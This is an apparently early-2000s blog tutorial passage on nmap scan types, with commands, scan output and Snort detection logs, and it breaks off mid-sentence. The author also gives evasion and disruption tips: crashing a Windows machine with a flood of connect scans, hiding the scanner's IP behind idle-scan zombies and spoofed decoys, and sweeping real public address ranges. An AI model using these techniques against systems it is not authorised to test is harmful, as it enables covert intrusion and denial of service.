/&gt;&lt;br /&gt;The nmap options or flags are a set of inbuilt variables that help you modify how nmap probes machines.&lt;br /&gt;&lt;br /&gt;By simply typing nmap at the command prompt you will get a breif explaination of each flag. &lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap&lt;br /&gt;Nmap 3.30 Usage: nmap [Scan Type(s)] [Options] &lt;host list="" net="" or=""&gt;&lt;br /&gt;Some Common Scan Types ('*' options require root privileges)&lt;br /&gt;* -sS TCP SYN stealth port scan (default if privileged (root))&lt;br /&gt;-sT TCP connect() port scan (default for unprivileged users)&lt;br /&gt;* -sU UDP port scan&lt;br /&gt;-sP ping scan (Find any reachable machines)&lt;br /&gt;* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)&lt;br /&gt;-sR/-I RPC/Identd scan (use with other scan types)&lt;br /&gt;Some Common Options (none are required, most can be combined):&lt;br /&gt;* -O Use TCP/IP fingerprinting to guess remote operating system&lt;br /&gt;-p &lt;range&gt; ports to scan. Example range: '1-1024,1080,6666,31337'&lt;br /&gt;-F Only scans ports listed in nmap-services&lt;br /&gt;-v Verbose. Its use is recommended. Use twice for greater effect.&lt;br /&gt;-P0 Don't ping hosts (needed to scan www.microsoft.com and others)&lt;br /&gt;* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys&lt;br /&gt;-6 scans via IPv6 rather than IPv4&lt;br /&gt;-T &lt;paranoid|sneaky|polite|normal|aggressive|insane&gt; General timing policy&lt;br /&gt;-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]&lt;br /&gt;-oN/-oX/-oG &lt;logfile&gt; Output normal/XML/grepable scan logs to &lt;logfile&gt;&lt;br /&gt;-iL &lt;inputfile&gt; Get targets from file; Use '-' for stdin&lt;br /&gt;* -S &lt;your_ip&gt;/-e &lt;devicename&gt; Specify source address or network interface&lt;br /&gt;--interactive Go into interactive mode (then press h for help)&lt;br /&gt;Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'&lt;br /&gt;SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES&lt;br /&gt;&lt;br /&gt;Syn/Stealth Scanning. -sS TCP SYN stealth port scan (default if privileged (root))&lt;/devicename&gt;&lt;/your_ip&gt;&lt;/inputfile&gt;&lt;/logfile&gt;&lt;/logfile&gt;&lt;/paranoid|sneaky|polite|normal|aggressive|insane&gt;&lt;/range&gt;&lt;/host&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt; The first and most widely used method is syn scanning also known as half open or stealth, unfortunately most decent ids (intrusion detection systems) can detected these packets and some firewalls and packet filterers will drop syn packets not allowing you to get a fingerprint of what the host is running. With a syn/stealth scan you do not actually make a full connection when scanning what happens is you send a syn packet and request a connection, the host being scanned then responds with a syn/ack packet telling you weather or not the port is open and responding, as soon as you receive the syn/ack packet from the remote host  nmap sends a rst packet terminating the connection.  So you don't actually make a full connection or 3 way handshake, that's why Syn/stealth scanning is called a half scan, due to the fact that nmap sends a rst  packet before a full connection is established.&lt;br /&gt;&lt;br /&gt;Issuing a Syn/Stealth scan.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]#nmap -sS 192.168.0.1&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 05:07 EST&lt;br /&gt;Interesting ports on 192.168.0.4:&lt;br /&gt;(The 1637 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp filtered ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;23/tcp open telnet&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;1024/tcp open kdm&lt;br /&gt;6000/tcp open X11&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 3.194 seconds&lt;br /&gt;&lt;br /&gt;Notice how port 21 is filtered, a filtered port usually indicates the machine is running a firewall.&lt;br /&gt;&lt;br /&gt;Here is a snort log of syn/stealth scanning.&lt;br /&gt;&lt;br /&gt;[**] [111:13:1] spp_stream4: STEALTH ACTIVITY (SYN FIN scan) detection [**]&lt;br /&gt;07/15-14:45:47.877211 192.168.0.3:10004 -&amp;gt; 202.87.19.229:1002&lt;br /&gt;TCP TTL:255 TOS:0x0 ID:2304 IpLen:20 DgmLen:40&lt;br /&gt;******SF Seq: 0x90AB213  Ack: 0x0  Win: 0x1000  TcpLen: 20&lt;br /&gt;&lt;br /&gt;Jul 16 11:52:17 192.168.0.4:1460 -&amp;gt; 192.168.0.3:1109 SYN ******S*&lt;br /&gt;Jul 16 11:52:17 192.168.0.4:1461 -&amp;gt; 192.168.0.3:317 SYN ******S*&lt;br /&gt;Jul 16 11:52:17 192.168.0.4:1462 -&amp;gt; 192.168.0.3:174 SYN ******S*&lt;br /&gt;Jul 16 11:52:17 192.168.0.4:1463 -&amp;gt; 192.168.0.3:504 SYN ******S*&lt;br /&gt;Jul 16 11:52:17 192.168.0.4:1464 -&amp;gt; 192.168.0.3:343 SYN ******S*&lt;br /&gt;Jul 16 11:52:17 192.168.0.4:1465 -&amp;gt; 192.168.0.3:672 SYN ******S*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As you can see snort has built a ruleset that is able to identify nmap's syn/stealth scanning sequence.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;TCP()Connect Scanning. -sT TCP connect() port scan (default for unprivileged users)&lt;br /&gt;&lt;br /&gt;Tcp connect scanning is the most basic or primitive form of scanning, almost all MS windows scanners use this method. TCP()Connect scanning is the fastest method of scanning, as it calls up system connect() and you can specify how many sockets you would like to use ,so 60 sockets means 60 connections at once. Yes that's fast. Now with the down sides of TCP() connect scanning, it's noisy every machine in the world  will log a tcp connection (()connect) request so every time you send one your being logged by whatever service you make the connection too. So if you make full connections to every service listening on every port people will know exactly what you are doing.&lt;br /&gt;&lt;br /&gt;Issuing a TCP()Connect scan&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -sT 192.168.0.3&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 10:02 EST&lt;br /&gt;Interesting ports on 192.168.0.3:&lt;br /&gt;(The 1629 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;9/tcp open discard&lt;br /&gt;13/tcp open daytime&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;25/tcp open smtp&lt;br /&gt;37/tcp open time&lt;br /&gt;80/tcp open http&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;113/tcp open auth&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;443/tcp open https&lt;br /&gt;515/tcp open printer&lt;br /&gt;993/tcp open imaps&lt;br /&gt;995/tcp open pop3s&lt;br /&gt;9999/tcp open abyss&lt;br /&gt;&lt;br /&gt;Another thing you can do with the -sT scan is DOS (Denial Of Service) a machine.&lt;br /&gt;&lt;br /&gt;I issued nmap the following&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -T 5 -M 1000 -sT 192.168.0.1&lt;br /&gt;Warning: Your max_parallelism (-M) option is absurdly high! Don't complain to Fyodor if all hell breaks loose!&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-18 06:44 EST&lt;br /&gt;All 1644 scanned ports on 192.168.0.1 are: filtered&lt;br /&gt;&lt;br /&gt;The machine i pointed this at was a windows xp professional box, the effects were obvious, the machine stooped responding and the mouse locked up. You can crash windows firewalls with these scans aswell so take care are using this method.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If you look at the command i gave nmap -T 5 -M 1000.&lt;br /&gt;&lt;br /&gt;The -M flag sets the maximum amount of sockets nmap uses and 60 is classified as being allot, so 1000 is absurdly high according to fydor and i must agree. But it was effective.&lt;br /&gt;&lt;br /&gt;The -T flag sets the rate or speed nmap scans hosts ranging from 0-5,  0 being the slowest and 5 being the fastest.&lt;br /&gt;&lt;br /&gt;0 = Paranoid  Tries to avoid IDS detection, no parallel scanning. &lt;br /&gt;Waits 5 minutes before sending each packet, so very very slow.&lt;br /&gt;&lt;br /&gt;1 = Sneaky also tries to avoid IDS detection, no parallel scanning. &lt;br /&gt;Waits 15 seconds before sending packets.&lt;br /&gt;&lt;br /&gt;2 = Polite Still very slow, and should be used against mission critical systems only, &lt;br /&gt;will be detected by all IDS machines. Waits at least 0.4 seconds between packets, &lt;br /&gt;more like about 1 sec per packet. &lt;br /&gt;&lt;br /&gt;3 = Normal is nmaps default scanning speed and goes as fast as possible without&lt;br /&gt;the risk of Denial Of Service.&lt;br /&gt;&lt;br /&gt;4 = Aggressive is ok for fast networks, it can help against firewalls and heavily &lt;br /&gt;filtered networks. Recommended for people on cable/adsl and t1 networks ect..&lt;br /&gt;&lt;br /&gt;5 = Insane is insane times out after 0.3 seconds, so you will miss a lot of information. &lt;br /&gt;Great for people on a fast connections and recommended for network sweeps.&lt;br /&gt;&lt;br /&gt;Here is a example of the trace from snort you leave on a system if you TCP() connect scan it. Not only will all IDS machines log these scans but so will every daemon or service you connect to e.g ftp,sendmail,telnet,ssh,samba,&lt;br /&gt;&lt;br /&gt;[**] [100:2:1] spp_portscan: portscan status from 192.168.0.4: 261 connections across 1 hosts: TCP(261), UDP(0) [**]&lt;br /&gt;07/16-12:01:44.071271&lt;br /&gt;&lt;br /&gt;[**] [1:469:1] ICMP PING NMAP [**]&lt;br /&gt;[Classification: Attempted Information Leak] [Priority: 2]&lt;br /&gt;07/16-12:01:46.050056 192.168.0.4 -&amp;gt; 192.168.0.3&lt;br /&gt;ICMP TTL:45 TOS:0x0 ID:17750 IpLen:20 DgmLen:28&lt;br /&gt;Type:8  Code:0  ID:31266   Seq:8282  ECHO&lt;br /&gt;[Xref =&amp;gt; http://www.whitehats.com/info/IDS162]&lt;br /&gt;&lt;br /&gt;Jul 16 12:19:39 192.168.0.4:2418 -&amp;gt; 192.168.0.3:7006 SYN ******S*&lt;br /&gt;Jul 16 12:19:39 192.168.0.4:2419 -&amp;gt; 192.168.0.3:7006 SYN ******S*&lt;br /&gt;Jul 16 12:19:39 192.168.0.4:2420 -&amp;gt; 192.168.0.3:7006 SYN ******S*&lt;br /&gt;&lt;br /&gt;You will notice that the main protocol is TCP (TCP(261)). And it established a lot of 3 way connections.&lt;br /&gt;&lt;br /&gt;UDP scan -sU UDP port scan&lt;br /&gt;&lt;br /&gt;The very simple connectionless User Data Protocol that is used for transmitting datagrams only. Basicly what the udp scans does is send datagrams and waits for a error response message  from the host, it then calcualates what ports are open by not receiveing a error message suggesting it is open. Udp scanning is extemely slow, due to service response limitation of over atleast 1-4 seconds due to rfc compliance on *nix type systems, however windows has no set limitations so it will scan alot faster. I also suggest only scanning with udp as root consideing the limitations non root users face in distinguishing open and closed ports. Sure udp scanning can find all udp services but so can TCP()Connect  scans and TCP()Connect. For me personaly i think udp scanning is a waste of time. But to get a true finger print of each machine it might be wise to know what you have got listening on each udp port as allot of trojans listen on udp.&lt;br /&gt;&lt;br /&gt;Issuing a UDP scan&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -sU 192.168.0.3&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 11:05 EST&lt;br /&gt;Interesting ports on 192.168.0.3:&lt;br /&gt;(The 1467 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;9/udp open discard&lt;br /&gt;111/udp open sunrpc&lt;br /&gt;137/udp open netbios-ns&lt;br /&gt;138/udp open netbios-dgm&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 1473.816 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As you can see all the ports listed above are udp ports. To make things more interesting here is a scan from a windows xp machine.&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 11:41 EST&lt;br /&gt;Interesting ports on 192.168.0.1:&lt;br /&gt;(The 1463 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;53/udp open domain&lt;br /&gt;123/udp open ntp&lt;br /&gt;135/udp open loc-srv&lt;br /&gt;137/udp open netbios-ns&lt;br /&gt;138/udp open netbios-dgm&lt;br /&gt;445/udp open microsoft-ds&lt;br /&gt;500/udp open isakmp&lt;br /&gt;1900/udp open UPnP&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 7.285 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If you have a look at the bottom of each scan you will notice the scan for the debian linux box took over 200 times longer than the xp pro box.  Thats because as mentioned above the *nix systems complying to RFC standards.&lt;br /&gt;&lt;br /&gt;During the scan on the debian box we set off some major bells and whistles. And on the windows xp box we fillterd the entire scan until the firewalls where turned off.&lt;br /&gt;&lt;br /&gt;Typical firewall, blocks nmap udp scans in it's tracks.&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 12:10 EST&lt;br /&gt;All 1471 scanned ports on 192.168.0.1 are: filtered&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 94.786 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Here is a snippet of the noise the udp scan made on the debian linux box running snort.&lt;br /&gt;&lt;br /&gt;[**] [1:279:2] DOS Bay/Nortel Nautica Marlin [**]&lt;br /&gt;[Classification: Attempted Denial of Service] [Priority: 2]&lt;br /&gt;07/16-13:18:46.140390 192.168.0.4:40310 -&amp;gt; 192.168.0.3:161&lt;br /&gt;UDP TTL:56 TOS:0x0 ID:43196 IpLen:20 DgmLen:28&lt;br /&gt;Len: 8&lt;br /&gt;[Xref =&amp;gt; http://www.securityfocus.com/bid/1009]&lt;br /&gt;[Xref =&amp;gt; http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0221]&lt;br /&gt;&lt;br /&gt;[**] [1:1042:2] WEB-IIS view source via translate header [**]&lt;br /&gt;[Classification: access to a potentually vulnerable web application] [Priority: 2]&lt;br /&gt;07/16-13:53:47.031804 192.168.0.1:4752 -&amp;gt; 192.168.0.3:80&lt;br /&gt;TCP TTL:128 TOS:0x0 ID:9488 IpLen:20 DgmLen:187 DF&lt;br /&gt;***AP*** Seq: 0x231C3970  Ack: 0x4242DB37  Win: 0xFAF0  TcpLen: 20&lt;br /&gt;[Xref =&amp;gt; http://www.whitehats.com/info/IDS305]&lt;br /&gt;&lt;br /&gt;[**] [1:1042:2] WEB-IIS view source via translate header [**]&lt;br /&gt;[Classification: access to a potentually vulnerable web application] [Priority: 2]&lt;br /&gt;07/16-13:53:47.090385 192.168.0.1:4752 -&amp;gt; 192.168.0.3:80&lt;br /&gt;TCP TTL:128 TOS:0x0 ID:9490 IpLen:20 DgmLen:204 DF&lt;br /&gt;***AP*** Seq: 0x231C3A03  Ack: 0x4242DC29  Win: 0xF9FE  TcpLen: 20&lt;br /&gt;[Xref =&amp;gt; http://www.whitehats.com/info/IDS305]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Snort did not detect the actual portscan as a portscan but it did report that the system was under attack. Not the greatest scanning technique.&lt;br /&gt;&lt;br /&gt;Pinging  -sP ping scan (Find any reachable machines)&lt;br /&gt;&lt;br /&gt;All pinging does is distinguish if a host is up or down. It sends out ICMP echo request to hosts and if they respond there up.&lt;br /&gt;&lt;br /&gt;Simple packet trace of a ping query. You can see the initial ICMP echo request and response by adding the following flag to a nmap scan.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap --packet_trace  -sP 192.168.0.*&lt;br /&gt;&lt;br /&gt;SENT (1.1890s) ICMP 192.168.0.4 &amp;gt; 192.168.0.1 Echo request (type=8/code=0) ttl=54 id=32934 iplen=28&lt;br /&gt;SENT (1.1890s) TCP 192.168.0.4:51585 &amp;gt; 192.168.0.1:80 A ttl=59 id=44623 iplen=40 seq=3782306078 win=4096 ack=3782306078&lt;br /&gt;RCVD (1.1930s) ICMP 192.168.0.1 &amp;gt; 192.168.0.4 Echo reply (type=0/code=0) ttl=128 id=4482 iplen=28&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Some sites block pings as it is quite effective in cloaking the host from some scanners.&lt;br /&gt;&lt;br /&gt;Heres some basic tricks you can do with -sP ping.&lt;br /&gt;&lt;br /&gt;Say if you wanted to know every machine that is up on a class C network you would issue nmap.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -sP 192.168.0.*&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 13:40 EST&lt;br /&gt;Host 192.168.0.0 seems to be a subnet broadcast address (returned 1 extra pings).&lt;br /&gt;Host 192.168.0.1 appears to be up.&lt;br /&gt;Host 192.168.0.3 appears to be up.&lt;br /&gt;Host 192.168.0.4 appears to be up.&lt;br /&gt;Host 192.168.0.255 seems to be a subnet broadcast address (returned 1 extra pings).&lt;br /&gt;Nmap run completed -- 256 IP addresses (3 hosts up) scanned in 11.721 seconds&lt;br /&gt;&lt;br /&gt;Nmap scanned 256 ip address and found 3 host up.&lt;br /&gt;&lt;br /&gt;You can also scan class b networks by doing the following&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -sP 202.12.*.*&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 13:53 EST&lt;br /&gt;Host me-202-12-3-129.btw.co.nz (202.12.3.129) appears to be up.&lt;br /&gt;Host me-202-12-3-130.btw.co.nz (202.12.3.130) appears to be up.&lt;br /&gt;Host me-202-12-3-135.btw.co.nz (202.12.3.135) appears to be up.&lt;br /&gt;Host me-202-12-3-137.btw.co.nz (202.12.3.137) appears to be up.&lt;br /&gt;&lt;br /&gt;If i had not of stopped nmap it would have scanned 65536 hosts. From 202.12.0.0 to 202.12.256.256.  There are other ways of scanning class c networks using the slash e.g 192.168.0.0/24 and for class b use /16. Not only that but you can even add more options for example every host in class be that starts with 1. You would issue nmap the following.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -sP 202.12.*.1&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 13:53 EST&lt;br /&gt;Host scorpio.psu.ac.th (202.12.74.1) appears to be up.&lt;br /&gt;Host 202.12.92.1 appears to be down.&lt;br /&gt;Host 202.12.93.1 appears to be down.&lt;br /&gt;Host 202.12.94.1 appears to be down.&lt;br /&gt;Host 202.12.95.1 appears to be down.&lt;br /&gt;Host 202.12.96.1 appears to be down.&lt;br /&gt;Host kku1.kku.ac.th (202.12.97.1) appears to be up.&lt;br /&gt;&lt;br /&gt;I will get more into this stuff later in the lesson.&lt;br /&gt;&lt;br /&gt;Ftp Bounce Attack  -b &lt;ftp host="" relay=""&gt;&lt;br /&gt;&lt;br /&gt;This was a good fun, unfortunatly it's no longer possible. So i won't bother going into detail.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -b 192.168.0.4 192.168.0.1&lt;br /&gt;Hint: if your bounce scan target hosts aren't reachable from here, remember to use -P0 so we don't try and ping them prior to the scan&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-18 09:25 EST&lt;br /&gt;Your ftp bounce server doesn't allow priviliged ports, skipping them.&lt;br /&gt;Your ftp bounce server doesn't allow priviliged ports, skipping them.&lt;br /&gt;Your ftp bounce server sucks, it won't let us feed bogus ports!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;this is the error you will get on every ftp server that you try this on.&lt;br /&gt;&lt;br /&gt;Idle scanning -sI &lt;zombie host[:probeport]=""&gt;&lt;br /&gt;&lt;br /&gt;Say if you where scanning the pentagon for some unknown reason. Would you want them to know youre IP address ? no. Well you can use Idle scanning. It uses a zombie host to transmit the packets using it's IPID,  ip identification number so everything that hit's the machine does not originate from you but the host you are using as the zombie. It uses the same technique as a Syn scan, the other 2 factors is the fragment identification number, nmap can source enough information from the FIN to know how many packets have been transmistted since the last packet you sent. And your zombie host must be idle.&lt;br /&gt;&lt;br /&gt;Here is a diagram taken from the official nmap site explaining Idle scanning.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So with idle scanning we can determine a the targets status by a increment in the zombies IPID number, if our target sends a rst packet to our zombie host we know the port is closed, but if we get a syn ack sent to our zombie host we know the port is open because the zombie then has to respond to the connection. You should know by know what the zombie responds with ? remember it's just a Syn scan, so the zombie terminates the connect with a reset, rst packet. Unfortunatly not all IPID stacks are predictable, as far as i know due to microsofts ignorant defiance of RFC stands all windows machine should be suitable as zombies, older linux machines should also be fine for zombies. You just have to keep trying until you find a suitable zombie with a predictable IPID. Other factors with Idle scanning is that i recommend using nmaps default tcp port 80 to be accessable on the zombie and a windows machine.&lt;br /&gt;&lt;br /&gt;Here is how predictable a windows machine is.&lt;br /&gt;&lt;br /&gt;SENT (98.9480s) TCP 192.168.0.4:33609 &amp;gt;192.168.0.1:828 A ttl=47 id=14515 iplen=40 seq=1085816310 win=4096 ack=1085816310&lt;br /&gt;RCVD (98.9640s) TCP 192.168.0.1:3344 &amp;gt; 192.168.0.4:22 A ttl=128 id=44516  iplen=40 seq=1375280861 win=64240 ack=1375280861&lt;br /&gt;RCVD (99.1390s) TCP 192.168.0.1:3344 &amp;gt; 192.168.0.4:22 A ttl=128 id=44517  iplen=40 seq=1375280861 win=64100 ack=1375280861&lt;br /&gt;RCVD (99.3390s) TCP 192.168.0.1:3344 &amp;gt; 192.168.0.4:22 A ttl=128 id=44518  iplen=40 seq=1375280861 win=63960 ack=1375280861&lt;br /&gt;&lt;br /&gt;As you can see the id= sequence is in a increments of 1.&lt;br /&gt;&lt;br /&gt;Here is a redhat linux 8.0 machine.&lt;br /&gt;&lt;br /&gt;RCVD (17.2850s) TCP 127.0.0.1:44076 &amp;gt; 192.168.0.4:360 A ttl=51 id=40722 iplen=40 seq=3848151658 win=4096 ack=3848151658&lt;br /&gt;RCVD (17.2850s) TCP 192.168.0.4:360 &amp;gt; 192.168.0.4:44076 R ttl=64 id=0 iplen=40 seq=3767092268 win=0&lt;br /&gt;RCVD (17.2850s) TCP 127.0.0.1:44076 &amp;gt; 192.168.0.4:3086 A ttl=47 id=63447 iplen=40 seq=3848151658 win=4096 ack=3848151658&lt;br /&gt;RCVD (17.2850s) TCP 192.168.0.4:3086 &amp;gt; 192.168.0.4:44076 R ttl=64 id=0 iplen=40 seq=3767092268 win=0&lt;br /&gt;&lt;br /&gt;The redhat box is too unprediectable to use as a Idle scan zombie. You must realize that for the idle scan to work the IPID number can only increase by 1 or 2, 1 being closed 2 being open.&lt;br /&gt;&lt;br /&gt;To issue a idle scan using nmaps default tcp() port 80 use.&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX root]# nmap -P0 -p- -sI 192.168.0.1 192.168.0.3&lt;br /&gt;&lt;br /&gt;Starting nmap V. 3.30 ( www.insecure.org/nmap/ )&lt;br /&gt;Idlescan using zombie 192.168.0.1; Class: Incremental&lt;br /&gt;Interesting ports on 192.168.0.3:&lt;br /&gt;(The 65522 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port  State  Service&lt;br /&gt;9/tcp open discard&lt;br /&gt;13/tcp open daytime&lt;br /&gt;21/tcp open ftp&lt;br /&gt;22/tcp open ssh&lt;br /&gt;25/tcp open smtp&lt;br /&gt;37/tcp open time&lt;br /&gt;80/tcp open http&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;113/tcp open auth&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;443/tcp open https&lt;br /&gt;515/tcp open printer&lt;br /&gt;993/tcp open imaps&lt;br /&gt;995/tcp open pop3s&lt;br /&gt;9999/tcp open abyss&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 1348.167seconds&lt;br /&gt;&lt;br /&gt;If the target checks it's logs there will be no trace of youre ip address, only the zombies. Some people do not realize the effects of Idle scanning, scans like this can crumble a entire network if the conditions are suitable. For example if the network admin has some type of packet filtering device running that co-exsist's with some form of rule set the blocks offending ip's from the network you could just spoof the dns server or mail server resulting in major denial of service.&lt;br /&gt;&lt;br /&gt;To find Predictable IPID's you will have to start trawling the internet with nessus. Here is the information from nessus. It's plugin ID is 10201.&lt;br /&gt;&lt;br /&gt;The remote host uses non-random IP IDs, that is, it is&lt;br /&gt;possible to predict the next value of the ip_id field of&lt;br /&gt;the ip packets sent by this host.&lt;br /&gt;&lt;br /&gt;An attacker may use this feature to determine if the remote&lt;br /&gt;host sent a packet in reply to another request. This may be&lt;br /&gt;used for portscanning and other things.&lt;br /&gt;&lt;br /&gt;When you do locate a machine with a predictable IPID you can then exploit certain areas of the network it is located on, considering it will be a trusted host on it's network.&lt;br /&gt;&lt;br /&gt;-D Decoy Scanning&lt;br /&gt;&lt;br /&gt;Decoy scanning can be used to effectively DOS or confuse the intended target. The decoy method is best described as making invalid connections on the behalf of a unaware host, basically you are sending spoofed packets with a fake source address along with your original address hoping to make it harder to find out exactly who is scanning them. If your ISP has egress filters all spoofing would be pointless but i suggest you still try it, because it is not a common implementation yet. You can also DOS a machine by sending spoofed packets on behalf of a trusted host, this only works if the machine blocks offending ip's from the network. Another thing to note is the more decoys the slower the scan for obvious reasons. &lt;br /&gt;&lt;br /&gt;Jul 23 17:53:45 192.168.0.7:59292 -&amp;gt; 192.168.0.3:3455 SYN ******S*&lt;br /&gt;Jul 23 17:53:45 192.168.0.7:59292 -&amp;gt; 192.168.0.3:173 SYN ******S*&lt;br /&gt;Jul 23 17:53:44 192.168.0.4:59292 -&amp;gt; 192.168.0.3:32 SYN ******S*&lt;br /&gt;Jul 23 17:53:44 192.168.0.4:59292 -&amp;gt; 192.168.0.3:759 SYN ******S*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Judging from the above log we where scanned by 2 offending ip address's one real and the other fake&lt;br /&gt;&lt;br /&gt;the issued Decoy scan was&lt;br /&gt;&lt;br /&gt;[root@REDHATBOX test]# nmap -p 80,22,139 -sS -D 192.168.0.7,192.168.0.1 192.168.0.3&lt;br /&gt;&lt;br /&gt;Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 15:58 EST&lt;br /&gt;Interesting ports on 192.168.0.3:&lt;br /&gt;Port State Service&lt;br /&gt;22/tcp open ssh&lt;br /&gt;80/tcp open http&lt;br /&gt;139/tcp open netbios-ssn&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 8.879 seconds&lt;br /&gt;&lt;br /&gt;there is a huge mistake in this scan though ? why decoy scan someone if your going to ping them ?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SENT (0.0060s) ICMP 192.168.0.4 &amp;gt; 192.168.0.3 Echo request (type=8/code=0) ttl=42 id=2717 iplen=28&lt;br /&gt;SENT (0.0070s) ICMP 192.168.0.7 &amp;gt; 192.168.0.3 Echo request (type=8/code=0) ttl=58 id=27663 iplen=28&lt;br /&gt;SENT (0.0070s) ICMP 192.168.0.1 &amp;gt; 192.168.0.3 Echo request (type=8/code=0) ttl=41 id=3618 iplen=28&lt;br /&gt;RCVD (0.0070s) ICMP 192.168.0.3 &amp;gt; 192.168.0.4 Echo reply (type=0/code=0) ttl=64 id=37318 iplen=28&lt;br /&gt;&lt;br /&gt;[**] [1:469:1] ICMP PING NMAP [**]&lt;br /&gt;[Classification: Attempted Information Leak] [Priority: 2]&lt;br /&gt;07/23-18:46:13.256183 192.168.0.4 -&amp;gt; 192.168.0.3&lt;br /&gt;ICMP TTL:42 TOS:0x0 ID:2717 IpLen:20 DgmLen:28&lt;br /&gt;Type:8  Code:0  ID:53476   Seq:52818  ECHO&lt;br /&gt;[Xref =&amp;gt; http://www.whitehats.com/info/IDS162]&lt;br /&gt;&lt;br /&gt;[**] [1:469:1] ICMP PING NMAP [**]&lt;br /&gt;[Classification: Attempted Information Leak] [Priority: 2]&lt;br /&gt;07/23-18:46:13.256190 192.168.0.7 -&amp;gt; 192.168.0.3&lt;br /&gt;ICMP TTL:58 TOS:0x0 ID:27663 IpLen:20 DgmLen:28&lt;br /&gt;Type:8  Code:0  ID:53476   Seq:52818  ECHO&lt;br /&gt;[Xref =&amp;gt; http://www.whitehats.com/info/IDS162]&lt;br /&gt;&lt;br /&gt;Ok so both ip's show up in a snort log ? who cares. I do because your ip might set of more warnings in snort than than the decoys. I have seen this happen once and I'm unable to reproduce it. And i do know that the real attackers ip in a decoy scan always shows up first in the snort alert log.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Disable pinging with the -P0 flag.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)&lt;br /&gt;&lt;br /&gt;Ok, say we are scanning a very paranoid network that drops syn and tcp()connect packets from the firewall.&lt;br /&gt;&lt;br /&gt;heres and example of a major locked down server.&lt;br /&gt;&lt;br /&gt;root@xboxLINUX:~# nmap -sS 192.168.0.4&lt;br /&gt;&lt;br /&gt;Starting nmap V. 2.54BETA31 ( www.insecure.org/nmap/ )&lt;br /&gt;Interesting ports on (192.168.0.4):&lt;br /&gt;(The 1553 ports scanned but not shown below are in state: filtered)&lt;br /&gt;Port State Service&lt;br /&gt;22/tcp open ssh&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nmap run completed -- 1 IP address (1 host up) scanned in 159 seconds&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As you can see this machine (redhat linux 8.0) has 